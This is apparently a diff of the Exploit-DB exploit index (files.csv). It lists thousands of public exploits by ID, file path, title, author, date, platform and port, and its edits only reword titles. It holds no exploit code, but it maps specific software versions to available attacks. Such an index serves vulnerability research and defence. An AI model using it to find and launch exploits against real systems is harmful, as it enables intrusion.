31032,platforms/windows/remote/31032.txt,"BitTorrent 6.0 and uTorrent 1.6/1.7 Peers Window Remote Code Execution",2008-01-16,"Luigi Auriemma",windows,remote,0 31033,platforms/hardware/webapps/31033.py,"ASUS RT-N56U - Remote Root Shell Buffer Overflow (ROP)",2014-01-19,"Jacob Holcomb",hardware,webapps,80 31034,platforms/php/webapps/31034.txt,"MyBB 1.2.10 - 'moderation.php' Multiple SQL Injection",2008-01-16,waraxe,php,webapps,0 -31035,platforms/php/webapps/31035.txt,"Clever Copy 3.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-01-17,hadihadi,php,webapps,0 +31035,platforms/php/webapps/31035.txt,"Clever Copy 3.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities",2008-01-17,hadihadi,php,webapps,0 31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules - Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0 31037,platforms/php/webapps/31037.txt,"phpAutoVideo 2.21 sidebar.php loadpage Parameter Remote File Inclusion",2008-01-18,"H-T Team",php,webapps,0 31038,platforms/php/webapps/31038.txt,"phpAutoVideo 2.21 index.php cat Parameter XSS",2008-01-18,"H-T Team",php,webapps,0 @@ -28028,7 +28028,7 @@ id,file,description,date,author,platform,type,port 31143,platforms/php/webapps/31143.txt,"PizzaInn_Project - SQL Injection",2014-01-23,vinicius777,php,webapps,0 31144,platforms/php/webapps/31144.txt,"mySeatXT 0.2134 - SQL Injection",2014-01-23,vinicius777,php,webapps,0 31145,platforms/php/webapps/31145.txt,"Easy POS System - SQL Injection (login.php)",2014-01-23,vinicius777,php,webapps,0 -31146,platforms/php/webapps/31146.txt,"Cells Blog 3.3 - XSS Reflected & Blind SQLite Injection",2014-01-23,vinicius777,php,webapps,0 +31146,platforms/php/webapps/31146.txt,"Cells Blog 3.3 - XSS Reflected / Blind SQLite Injection",2014-01-23,vinicius777,php,webapps,0 31147,platforms/php/webapps/31147.txt,"Adult Webmaster PHP - Password Disclosure",2014-01-23,vinicius777,php,webapps,0 31148,platforms/multiple/dos/31148.txt,"Opium OPI Server and CyanPrintIP - Format String / Denial of Service",2008-02-11,"Luigi Auriemma",multiple,dos,0 31149,platforms/windows/remote/31149.txt,"Sentinel Protection Server 7.x/Keys Server 1.0.x Backslash Directory Traversal",2008-02-11,"Luigi Auriemma",windows,remote,0 @@ -28124,7 +28124,7 @@ id,file,description,date,author,platform,type,port 31226,platforms/php/webapps/31226.txt,"Joomla! and Mambo com_detail Component - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0 31227,platforms/php/webapps/31227.txt,"Yellow Swordfish Simple Forum 1.x - 'sf-profile.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0 31228,platforms/php/webapps/31228.txt,"WordPress Recipes Blog Plugin 'id' Parameter - SQL Injection",2008-02-18,S@BUN,php,webapps,0 -31229,platforms/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection and Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,php,webapps,0 +31229,platforms/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,php,webapps,0 31230,platforms/php/webapps/31230.txt,"WordPress wp-people Plugin 2.0 - 'wp-people-popup.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0 31231,platforms/windows/remote/31231.txt,"SIMM-Comm SCI Photo Chat 3.4.9 - Directory Traversal",2008-02-19,"Luigi Auriemma",windows,remote,0 31232,platforms/multiple/dos/31232.txt,"Foxit WAC Remote Access Server 2.0 Build 3503 - Heap Buffer Overflow",2008-02-16,"Luigi Auriemma",multiple,dos,0 @@ -28316,7 +28316,7 @@ id,file,description,date,author,platform,type,port 31438,platforms/java/webapps/31438.txt,"IBM Rational ClearQuest 7.0 - Multiple Parameters Multiple Cross-Site Scripting Vulnerabilities",2008-03-19,sasquatch,java,webapps,0 31439,platforms/php/webapps/31439.txt,"cPanel 11.18.3 - List Directories and Folders Information Disclosure",2008-03-18,Linux_Drox,php,webapps,0 31440,platforms/linux/dos/31440.txt,"Asterisk 1.4.x - RTP Codec Payload Handling Multiple Buffer Overflow Vulnerabilities",2008-03-18,"Mu Security research",linux,dos,0 -31441,platforms/php/webapps/31441.txt,"MyBlog 1.x - SQL Injection and Remote File Inclusion",2008-03-19,Cod3rZ,php,webapps,0 +31441,platforms/php/webapps/31441.txt,"MyBlog 1.x - SQL Injection / Remote File Inclusion",2008-03-19,Cod3rZ,php,webapps,0 31442,platforms/asp/webapps/31442.txt,"Iatek PortalApp 4.0 - 'links.asp' SQL Injection",2008-03-19,xcorpitx,asp,webapps,0 31443,platforms/php/webapps/31443.txt,"CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting",2008-03-19,sasquatch,php,webapps,0 31444,platforms/linux/dos/31444.txt,"MySQL 5.1.13 - INFORMATION_SCHEMA Remote Denial Of Service",2007-12-05,"Masaaki HIROSE",linux,dos,0 @@ -28430,7 +28430,7 @@ id,file,description,date,author,platform,type,port 31565,platforms/php/webapps/31565.txt,"@lex Guestbook 4.0.5 - setup.php language_setup Parameter XSS",2008-03-31,ZoRLu,php,webapps,0 31566,platforms/php/webapps/31566.txt,"@lex Guestbook 4.0.5 - index.php test Parameter XSS",2008-03-31,ZoRLu,php,webapps,0 31567,platforms/php/webapps/31567.txt,"@lex Poll 1.2 - 'setup.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 -31568,platforms/php/webapps/31568.txt,"PHP Classifieds 6.20 - Multiple Cross-Site Scripting and Authentication Bypass Vulnerabilities",2008-03-31,ZoRLu,php,webapps,0 +31568,platforms/php/webapps/31568.txt,"PHP Classifieds 6.20 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities",2008-03-31,ZoRLu,php,webapps,0 31569,platforms/hardware/webapps/31569.txt,"D-Link DSL-2750B ADSL Router - CSRF",2014-02-11,killall-9,hardware,webapps,80 31570,platforms/php/webapps/31570.txt,"WordPress Frontend Upload Plugin - Arbitrary File Upload",2014-02-11,"Daniel Godoy",php,webapps,80 31571,platforms/php/webapps/31571.txt,"WordPress Buddypress Plugin 1.9.1 - Privilege Escalation",2014-02-11,"Pietro Oliva",php,webapps,80 @@ -28440,7 +28440,7 @@ id,file,description,date,author,platform,type,port 31574,platforms/arm/local/31574.c,"Linux Kernel < 3.4.5 (ARM Android 4.2.2 / 4.4) - Local Root Exploit",2014-02-11,"Piotr Szerman",arm,local,0 31575,platforms/windows/remote/31575.rb,"KingScada - kxClientDownload.ocx ActiveX Remote Code Execution",2014-02-11,Metasploit,windows,remote,0 31576,platforms/windows/local/31576.rb,"Windows TrackPopupMenuEx Win32k NULL Page",2014-02-11,Metasploit,windows,local,0 -31577,platforms/unix/remote/31577.rb,"Kloxo - SQL Injection and Remote Code Execution",2014-02-11,Metasploit,unix,remote,7778 +31577,platforms/unix/remote/31577.rb,"Kloxo - SQL Injection / Remote Code Execution",2014-02-11,Metasploit,unix,remote,7778 31578,platforms/windows/webapps/31578.txt,"Tableau Server - Blind SQL Injection",2014-02-11,"Trustwave's SpiderLabs",windows,webapps,80 31579,platforms/windows/webapps/31579.txt,"Titan FTP Server 10.32 Build 1816 - Directory Traversal",2014-02-11,"Fara Rustein",windows,webapps,0 31580,platforms/php/webapps/31580.txt,"Jax Guestbook 3.31/3.50 - 'jax_guestbook.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 @@ -28732,7 +28732,7 @@ id,file,description,date,author,platform,type,port 31878,platforms/windows/dos/31878.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Creation",2008-06-03,"Dennis Rand",windows,dos,0 31879,platforms/windows/dos/31879.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Delete",2008-06-03,"Dennis Rand",windows,dos,0 31880,platforms/php/webapps/31880.txt,"WyMIEN PHP 1.0 - 'index.php' Cross-Site Scripting",2008-06-04,ZoRLu,php,webapps,0 -31881,platforms/php/webapps/31881.txt,"PHP Address Book 3.1.5 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-06-04,"CWH Underground",php,webapps,0 +31881,platforms/php/webapps/31881.txt,"PHP Address Book 3.1.5 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities",2008-06-04,"CWH Underground",php,webapps,0 31882,platforms/php/webapps/31882.txt,"SamTodo 1.1 - 'tid' Parameter Cross-Site Scripting",2008-06-05,"David Sopas Ferreira",php,webapps,0 31883,platforms/php/webapps/31883.txt,"SamTodo 1.1 - 'completed' Parameter Cross-Site Scripting",2008-06-05,"David Sopas Ferreira",php,webapps,0 31884,platforms/hardware/dos/31884.txt,"Linksys WRH54G 1.1.3 - Wireless-G Router Malformed HTTP Request Denial of Service",2008-06-05,dubingyao,hardware,dos,0 @@ -28791,7 +28791,7 @@ id,file,description,date,author,platform,type,port 31940,platforms/osx/local/31940.txt,"Apple Mac OS X 10.x - AppleScript ARDAgent Shell Local Privilege Escalation",2008-06-19,anonymous,osx,local,0 31941,platforms/multiple/remote/31941.txt,"WISE-FTP 4.1/5.5.8 FTP Client 'LIST' Command Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote,0 31942,platforms/multiple/remote/31942.txt,"Classic FTP 1.02 - 'LIST' Command Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote,0 -31943,platforms/php/webapps/31943.html,"GL-SH Deaf Forum 6.5.5 - Cross-Site Scripting and Arbitrary File Upload",2008-06-20,"AmnPardaz ",php,webapps,0 +31943,platforms/php/webapps/31943.html,"GL-SH Deaf Forum 6.5.5 - Cross-Site Scripting / Arbitrary File Upload",2008-06-20,"AmnPardaz ",php,webapps,0 32214,platforms/php/webapps/32214.pl,"FreePBX 2.11.0 - Remote Command Execution",2014-03-12,@0x00string,php,webapps,80 31944,platforms/php/webapps/31944.txt,"PHPAuction 'profile.php' SQL Injection",2008-06-21,Mr.SQL,php,webapps,0 31945,platforms/php/webapps/31945.txt,"PEGames Multiple Cross-Site Scripting Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 @@ -28888,7 +28888,7 @@ id,file,description,date,author,platform,type,port 32034,platforms/php/webapps/32034.txt,"V-webmail 1.6.4 - includes/cachedConfig.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 32035,platforms/php/webapps/32035.txt,"V-webmail 1.6.4 - includes/prepend.php CONFIG[includes] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 32036,platforms/php/webapps/32036.txt,"V-webmail 1.6.4 - includes/email.list.search.php CONFIG[includes] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32037,platforms/php/webapps/32037.txt,"couponPHP CMS 1.0 - Multiple Stored XSS and SQL Injection",2014-03-03,LiquidWorm,php,webapps,0 +32037,platforms/php/webapps/32037.txt,"couponPHP CMS 1.0 - Multiple Stored XSS / SQL Injection",2014-03-03,LiquidWorm,php,webapps,0 32038,platforms/php/webapps/32038.txt,"SpagoBI 4.0 - Persistent XSS",2014-03-03,"Christian Catalano",php,webapps,0 32039,platforms/php/webapps/32039.txt,"SpagoBI 4.0 - Persistent HTML Script Insertion",2014-03-03,"Christian Catalano",php,webapps,0 32040,platforms/php/webapps/32040.txt,"SpagoBI 4.0 - Arbitrary XSS File Upload",2014-03-03,"Christian Catalano",php,webapps,0 @@ -28933,13 +28933,13 @@ id,file,description,date,author,platform,type,port 32085,platforms/php/webapps/32085.txt,"phpFreeChat 1.1 - 'demo21_with_hardocded_urls.php' Cross-Site Scripting",2008-07-18,ahmadbady,php,webapps,0 32086,platforms/multiple/dos/32086.c,"SWAT 4 - Multiple Denial Of Service Vulnerabilities",2008-07-20,"Luigi Auriemma",multiple,dos,0 32087,platforms/php/webapps/32087.txt,"EasyBookMarker 4.0 - 'ajaxp_backend.php' Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps,0 -32088,platforms/php/webapps/32088.pl,"EasyDynamicPages 3.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0 -32089,platforms/php/webapps/32089.pl,"EasyPublish 3.0 - 'read' Parameter Multiple SQL Injection and Cross-Site Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0 +32088,platforms/php/webapps/32088.pl,"EasyDynamicPages 3.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0 +32089,platforms/php/webapps/32089.pl,"EasyPublish 3.0 - 'read' Parameter Multiple SQL Injection / Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps,0 32090,platforms/php/webapps/32090.txt,"Maran PHP Blog 'comments.php' Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps,0 32091,platforms/php/webapps/32091.txt,"MyBlog 0.9.8 - Multiple Remote Information Disclosure Vulnerabilities",2008-07-21,"AmnPardaz Security Research Team",php,webapps,0 32092,platforms/php/webapps/32092.txt,"Flip 3.0 - 'config.php' Remote File Inclusion",2008-07-21,Cru3l.b0y,php,webapps,0 32093,platforms/php/webapps/32093.txt,"phpKF 'forum_duzen.php' SQL Injection",2008-07-21,U238,php,webapps,0 -32096,platforms/php/webapps/32096.pl,"EasyE-Cards 3.10 - (SQL Injection and Cross-Site Scripting) Multiple Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0 +32096,platforms/php/webapps/32096.pl,"EasyE-Cards 3.10 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0 32097,platforms/php/webapps/32097.txt,"Xoops 2.0.18 modules/system/admin.php fct Parameter Traversal Local File Inclusion",2008-07-21,Ciph3r,php,webapps,0 32098,platforms/php/webapps/32098.txt,"Xoops 2.0.18 modules/system/admin.php fct Parameter XSS",2008-07-21,Ciph3r,php,webapps,0 32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 - votepolls.php bbPath[path] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 @@ -29126,7 +29126,7 @@ id,file,description,date,author,platform,type,port 32303,platforms/linux/remote/32303.txt,"Mono 2.0 - 'System.Web' HTTP Header Injection",2008-08-20,"Juraj Skripsky",linux,remote,0 32304,platforms/linux/dos/32304.txt,"Red Hat 8/9 - Directory Server Crafted Search Pattern Denial of Service",2008-08-27,"Ulf Weltman",linux,dos,0 32305,platforms/hardware/dos/32305.txt,"Dreambox Web Interface URI Remote Denial of Service",2008-08-29,"Marc Ruef",hardware,dos,0 -32306,platforms/php/webapps/32306.txt,"dotProject 2.1.2 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-08-29,C1c4Tr1Z,php,webapps,0 +32306,platforms/php/webapps/32306.txt,"dotProject 2.1.2 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities",2008-08-29,C1c4Tr1Z,php,webapps,0 32307,platforms/php/webapps/32307.txt,"vtiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-01,"Fabian Fingerle",php,webapps,0 32308,platforms/php/webapps/32308.txt,"GenPortal 'buscarCat.php' Cross-Site Scripting",2008-09-01,sl4xUz,php,webapps,0 32309,platforms/php/webapps/32309.txt,"Full PHP Emlak Script - 'landsee.php' SQL Injection",2008-08-29,"Hussin X",php,webapps,0 @@ -29137,7 +29137,7 @@ id,file,description,date,author,platform,type,port 32314,platforms/php/webapps/32314.txt,"OpenDB 1.0.6 listings.php title Parameter XSS",2008-08-28,C1c4Tr1Z,php,webapps,0 32315,platforms/php/webapps/32315.txt,"OpenDB 1.0.6 user_profile.php redirect_url Parameter XSS",2008-08-28,C1c4Tr1Z,php,webapps,0 32316,platforms/php/webapps/32316.txt,"eliteCMS 1.0 - 'page' Parameter SQL Injection",2008-09-03,e.wiZz!,php,webapps,0 -32317,platforms/php/webapps/32317.txt,"@Mail 5.42 and @Mail WebMail 5.0.5 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-03,C1c4Tr1Z,php,webapps,0 +32317,platforms/php/webapps/32317.txt,"@Mail 5.42 and @Mail WebMail 5.0.5 - Multiple Cross-Site Scripting",2008-09-03,C1c4Tr1Z,php,webapps,0 32318,platforms/php/webapps/32318.txt,"XRms 1.99.2 login.php target Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 32319,platforms/php/webapps/32319.txt,"OpenSupports 2.x - Auth Bypass / CSRF",2014-03-17,"TN CYB3R",php,webapps,0 32320,platforms/php/webapps/32320.txt,"XRms 1.99.2 - activities/some.php title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 @@ -29341,7 +29341,7 @@ id,file,description,date,author,platform,type,port 32562,platforms/php/webapps/32562.txt,"Joomla Kunena Component 3.0.4 - Persistent XSS",2014-03-27,Qoppa,php,webapps,80 32565,platforms/multiple/remote/32565.txt,"Struts 2.0.11 - Multiple Directory Traversal Vulnerabilities",2008-11-04,"Csaba Barta",multiple,remote,0 32566,platforms/php/webapps/32566.txt,"firmCHANNEL Indoor & Outdoor Digital Signage 3.24 - Cross-Site Scripting",2008-11-04,"Brad Antoniewicz",php,webapps,0 -32567,platforms/php/webapps/32567.txt,"DHCart 3.84 - Multiple Cross-Site Scripting And HTML Injection Vulnerabilities",2008-11-04,Lostmon,php,webapps,0 +32567,platforms/php/webapps/32567.txt,"DHCart 3.84 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2008-11-04,Lostmon,php,webapps,0 32568,platforms/windows/remote/32568.rb,"Fitnesse Wiki - Remote Command Execution (Metasploit)",2014-03-28,"SecPod Research",windows,remote,80 32569,platforms/ios/webapps/32569.txt,"iStArtApp FileXChange 6.2 iOS - Multiple Vulnerabilities",2014-03-28,Vulnerability-Lab,ios,webapps,8888 32570,platforms/php/webapps/32570.txt,"CuteNews aj-fork 'path' Parameter Remote File Inclusion",2008-11-06,DeltahackingTEAM,php,webapps,0 @@ -29469,7 +29469,7 @@ id,file,description,date,author,platform,type,port 32693,platforms/php/local/32693.php,"suPHP 0.7 - 'suPHP_ConfigPath' Safe Mode Restriction-Bypass",2008-12-31,Mr.SaFa7,php,local,0 32694,platforms/osx/dos/32694.pl,"Apple Safari 3.2 WebKit 'alink' Property Memory Leak Remote Denial of Service (1)",2009-01-01,"Jeremy Brown",osx,dos,0 32695,platforms/osx/dos/32695.php,"Apple Safari 3.2 WebKit 'alink' Property Memory Leak Remote Denial of Service (2)",2009-01-01,Pr0T3cT10n,osx,dos,0 -32696,platforms/linux/dos/32696.txt,"KDE Konqueror 4.1 - Multiple Cross-Site Scripting and Denial of Service Vulnerabilities",2009-01-02,athos,linux,dos,0 +32696,platforms/linux/dos/32696.txt,"KDE Konqueror 4.1 - Multiple Cross-Site Scripting / Denial of Service Vulnerabilities",2009-01-02,athos,linux,dos,0 32697,platforms/linux/dos/32697.pl,"aMSN - (.ctt) Remote Denial of Service",2009-01-03,Hakxer,linux,dos,0 32698,platforms/php/webapps/32698.txt,"SolucionXpressPro 'main.php' SQL Injection",2009-01-05,Ehsan_Hp200,php,webapps,0 32699,platforms/windows/remote/32699.txt,"Google Chrome 1.0.154.36 - FTP Client PASV Port Scan Information Disclosure",2009-01-05,"Aditya K Sood",windows,remote,0 @@ -29651,7 +29651,7 @@ id,file,description,date,author,platform,type,port 32885,platforms/unix/remote/32885.rb,"Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root RCE (Metasploit)",2014-04-15,"Brandon Perry",unix,remote,443 32886,platforms/hardware/webapps/32886.txt,"Xerox DocuShare - SQL Injection",2014-04-15,"Brandon Perry",hardware,webapps,8080 32888,platforms/asp/webapps/32888.txt,"Asbru Web Content Management 6.5/6.6.9 - SQL Injection / Cross-Site Scripting",2009-04-02,"Patrick Webster",asp,webapps,0 -32889,platforms/php/webapps/32889.txt,"4CMS - SQL Injection and Local File Inclusion",2009-04-02,k1ll3r_null,php,webapps,0 +32889,platforms/php/webapps/32889.txt,"4CMS - SQL Injection / Local File Inclusion",2009-04-02,k1ll3r_null,php,webapps,0 32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/2003/Vista/2008 - WMI Service Isolation Local Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Local Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 32893,platforms/windows/local/32893.txt,"Microsoft Windows VISTA/2008 - Thread Pool ACL Local Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 @@ -29698,11 +29698,11 @@ id,file,description,date,author,platform,type,port 32938,platforms/hardware/remote/32938.c,"Sercomm TCP/32674 Backdoor Reactivation",2014-04-18,Synacktiv,hardware,remote,32674 32939,platforms/windows/dos/32939.txt,"Trend Micro OfficeScan 8.0 Client - Denial of Service",2009-04-21,"Juan Pablo Lopez Yacubian",windows,dos,0 32940,platforms/java/webapps/32940.txt,"Sun Java System Delegated Administrator 6.x HTTP Response Splitting",2009-04-21,"SCS team",java,webapps,0 -32941,platforms/php/webapps/32941.txt,"PTCeffect 4.6 - LFI & SQL Injection",2014-04-19,"walid naceri",php,webapps,0 +32941,platforms/php/webapps/32941.txt,"PTCeffect 4.6 - LFI / SQL Injection",2014-04-19,"walid naceri",php,webapps,0 32942,platforms/linux/remote/32942.txt,"Mozilla - Multiple Products Server Refresh Header XSS",2009-04-22,"Olli Pettay",linux,remote,0 32943,platforms/hardware/webapps/32943.txt,"Teracom Modem T2-B-Gawv1.4U10Y-BI - CSRF",2014-04-20,"Rakesh S",hardware,webapps,0 32944,platforms/multiple/remote/32944.txt,"SAP cFolders - Cross-Site Scripting / HTML Injection",2009-04-21,"Digital Security Research Group",multiple,remote,0 -32945,platforms/multiple/remote/32945.txt,"010 Editor 3.0.4 File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",multiple,remote,0 +32945,platforms/multiple/remote/32945.txt,"010 Editor 3.0.4 - File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",multiple,remote,0 32946,platforms/freebsd/local/32946.c,"FreeBSD 7.1 libc Berkley DB Interface Uninitialized Memory Local Information Disclosure",2009-01-15,"Jaakko Heinonen",freebsd,local,0 32947,platforms/linux/local/32947.txt,"DirectAdmin 1.33.3 - '/CMD_DB' Backup Action Insecure Temporary File Creation",2009-04-22,anonymous,linux,local,0 32948,platforms/php/webapps/32948.txt,"New5starRating 1.0 - 'admin/control_panel_sample.php' SQL Injection",2009-04-22,zer0day,php,webapps,0 @@ -29714,7 +29714,7 @@ id,file,description,date,author,platform,type,port 32954,platforms/hardware/remote/32954.txt,"Linksys WVC54GCA 1.00R22/1.00R24 Wireless-G 'adm/file.cgi' Multiple Directory Traversal Vulnerabilities",2009-04-23,pagvac,hardware,remote,0 32955,platforms/hardware/remote/32955.js,"Linksys WVC54GCA 1.00R22/1.00R24 Wireless-G Multiple Cross-Site Scripting Vulnerabilities",2009-04-25,pagvac,hardware,remote,0 32956,platforms/windows/dos/32956.py,"RealNetworks RealPlayer Gold 10.0 MP3 File Handling Remote Denial of Service",2009-04-27,"Abdul-Aziz Hariri",windows,dos,0 -32957,platforms/windows/remote/32957.txt,"DWebPro 6.8.26 - Directory Traversal and Arbitrary File Disclosure",2009-04-27,"Alfons Luja",windows,remote,0 +32957,platforms/windows/remote/32957.txt,"DWebPro 6.8.26 - Directory Traversal / Arbitrary File Disclosure",2009-04-27,"Alfons Luja",windows,remote,0 32958,platforms/php/webapps/32958.txt,"MataChat 'input.php' Multiple Cross-Site Scripting Vulnerabilities",2009-04-27,Am!r,php,webapps,0 32959,platforms/windows/remote/32959.rb,"Adobe Flash Player Regular Expression Heap Overflow",2014-04-21,Metasploit,windows,remote,0 33337,platforms/osx/dos/33337.c,"Apple Mac OS X 10.5.x - 'ptrace' Mutex Handling Local Denial of Service",2009-11-04,"Micheal Turner",osx,dos,0 @@ -29758,14 +29758,14 @@ id,file,description,date,author,platform,type,port 32999,platforms/php/webapps/32999.py,"Bonefire 0.7.1 - Reinstall Admin Account Exploit",2014-04-24,"Mehmet Ince",php,webapps,0 33057,platforms/php/webapps/33057.txt,"Aardvark Topsites PHP 5.2 - 'index.php' Cross-Site Scripting",2009-05-26,anonymous,php,webapps,0 33000,platforms/php/webapps/33000.txt,"Cacti 0.8.7 - 'data_input.php' Cross-Site Scripting",2009-05-15,fgeek,php,webapps,0 -33001,platforms/php/webapps/33001.ssh,"Kingsoft Webshield 1.1.0.62 - Cross-Site scripting and Remote Command Execution",2009-05-20,inking,php,webapps,0 +33001,platforms/php/webapps/33001.ssh,"Kingsoft Webshield 1.1.0.62 - Cross-Site scripting / Remote Command Execution",2009-05-20,inking,php,webapps,0 33002,platforms/php/webapps/33002.txt,"Profense 2.2.20/2.4.2 Web Application Firewall Security Bypass",2009-05-20,EnableSecurity,php,webapps,0 33003,platforms/php/webapps/33003.txt,"WordPress Work-The-Flow Plugin 1.2.1 - Arbitrary File Upload",2014-04-24,nopesled,php,webapps,80 33004,platforms/php/webapps/33004.txt,"dompdf 0.6.0 (dompdf.php read param) - Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80 33005,platforms/php/webapps/33005.txt,"WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion",2014-04-24,"SEC Consult",php,webapps,80 33006,platforms/php/webapps/33006.txt,"AlienVault 4.3.1 - Unauthenticated SQL Injection",2014-04-24,"Sasha Zivojinovic",php,webapps,443 33007,platforms/multiple/remote/33007.txt,"Novell GroupWise 8.0 WebAccess Multiple Security Vulnerabilities",2009-05-21,"Gregory Duchemin",multiple,remote,0 -33008,platforms/php/webapps/33008.txt,"LxBlog Multiple Cross-Site Scripting and SQL Injection",2009-05-22,Securitylab.ir,php,webapps,0 +33008,platforms/php/webapps/33008.txt,"LxBlog Multiple Cross-Site Scripting / SQL Injection",2009-05-22,Securitylab.ir,php,webapps,0 33009,platforms/asp/webapps/33009.txt,"DotNetNuke 4.9.3 - 'ErrorPage.aspx' Cross-Site Scripting",2009-05-22,"ben hawkes",asp,webapps,0 33010,platforms/hardware/remote/33010.txt,"SonicWALL Global VPN Client 4.0 Log File Remote Format String",2009-05-26,lofi42,hardware,remote,0 33011,platforms/php/webapps/33011.txt,"PHP-Nuke 8.0 - 'main/tracking/userLog.php' SQL Injection",2009-05-27,"Gerendi Sandor Attila",php,webapps,0 @@ -29779,7 +29779,7 @@ id,file,description,date,author,platform,type,port 33019,platforms/multiple/webapps/33019.txt,"miSecureMessages 4.0.1 - Session Management / Authentication Bypass",2014-04-25,"Jared Bird",multiple,webapps,0 33020,platforms/linux/dos/33020.py,"CUPS 1.3.9 - 'cups/ipp.c' NULL Pointer Dereference Denial Of Service",2009-06-02,"Anibal Sacco",linux,dos,0 33021,platforms/php/webapps/33021.txt,"PHP-Nuke 8.0 Downloads Module 'query' Parameter Cross-Site Scripting",2009-06-02,"Schap Security",php,webapps,0 -33022,platforms/php/webapps/33022.txt,"Joomla! < 1.5.11 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2009-06-03,"Airton Torres",php,webapps,0 +33022,platforms/php/webapps/33022.txt,"Joomla! < 1.5.11 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2009-06-03,"Airton Torres",php,webapps,0 33023,platforms/multiple/remote/33023.txt,"Apache Tomcat 6.0.18 Form Authentication Existing/Non-Existing Username Enumeration Weakness",2009-06-03,"D. Matscheko",multiple,remote,0 33024,platforms/windows/remote/33024.txt,"Microsoft Internet Explorer 5.0.1 - Cached Content Cross Domain Information Disclosure",2009-06-09,"Jorge Luis Alvarez Medina",windows,remote,0 33025,platforms/windows/remote/33025.txt,"LogMeIn 4.0.784 - 'cfgadvanced.html' HTTP Header Injection",2009-06-05,Inferno,windows,remote,0 @@ -29907,7 +29907,7 @@ id,file,description,date,author,platform,type,port 33148,platforms/linux/dos/33148.c,"Linux Kernel 2.6.x - 'posix-timers.c' NULL Pointer Dereference Denial of Service",2009-08-06,"Hiroshi Shimamoto",linux,dos,0 33149,platforms/php/webapps/33149.txt,"Alkacon OpenCMS 7.x - Multiple Input Validation Vulnerabilities",2009-08-06,"Katie French",php,webapps,0 33346,platforms/jsp/webapps/33346.txt,"McAfee Network Security Manager 5.1.7 - Multiple Cross-Site Scripting Vulnerabilities",2009-11-06,"Daniel King",jsp,webapps,0 -33152,platforms/php/webapps/33152.txt,"PhotoPost PHP 3.3.1 - 'cat' Parameter Cross-Site Scripting and SQL Injection",2009-08-07,"599eme Man",php,webapps,0 +33152,platforms/php/webapps/33152.txt,"PhotoPost PHP 3.3.1 - 'cat' Parameter Cross-Site Scripting / SQL Injection",2009-08-07,"599eme Man",php,webapps,0 33153,platforms/php/webapps/33153.txt,"SupportPRO SupportDesk 3.0 - 'shownews.php' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 33154,platforms/php/webapps/33154.txt,"SQLiteManager 1.2 - 'main.php' Cross-Site Scripting",2009-08-10,"Hadi Kiamarsi",php,webapps,0 33155,platforms/php/webapps/33155.txt,"ViArt CMS forums.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0 @@ -29997,7 +29997,7 @@ id,file,description,date,author,platform,type,port 33345,platforms/php/webapps/33345.txt,"CuteNews 1.4.6 editnews Module doeditnews Action Admin Moderation Bypass",2009-11-10,"Andrew Horton",php,webapps,0 33343,platforms/php/webapps/33343.txt,"CuteNews 1.4.6 register.php result Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0 33344,platforms/php/webapps/33344.txt,"CuteNews 1.4.6 index.php New User Creation 